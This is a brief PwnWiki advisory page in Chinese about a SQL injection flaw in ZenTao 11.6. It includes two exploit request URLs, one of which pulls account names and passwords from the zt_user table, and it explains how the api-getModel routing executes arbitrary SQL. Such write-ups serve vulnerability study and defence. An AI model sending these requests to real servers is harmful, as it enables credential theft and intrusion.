禪道11.6 SQL注入漏洞

From PwnWiki
Revision as of 17:09, 11 April 2021 by Pwnwiki (talk | contribs)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

影響版本

禪道 11.6


漏洞地址

http://xxx.xxx/zentaopms_11.6/www/api-getModel-user-getRealNameAndEmails-users=admin

http://xxx.xxx/zentaopms_11.6/www/api-getModel-api-sql-sql=select+account,password+from+zt_user

漏洞信息

最新版所採用的pathinfo模式:

首先通過傳參確定進入的control文件為api,對應的method為getModel,接著開始對參數進行賦值,其中moduleName為api,methodName=sql,最後的param為sql=select+account,password+from+zt_user,那麼調用了call_user_func_array函數後,會進入到api目錄下的model文件,對應調用其中的sql函數,並通過賦值,將sql變量賦值為select+ account,password+from+zt_user,最後執行query語句。

Retrieved from "https://pwnwiki.com/index.php?title=禪道11.6_SQL注入漏洞&oldid=1536"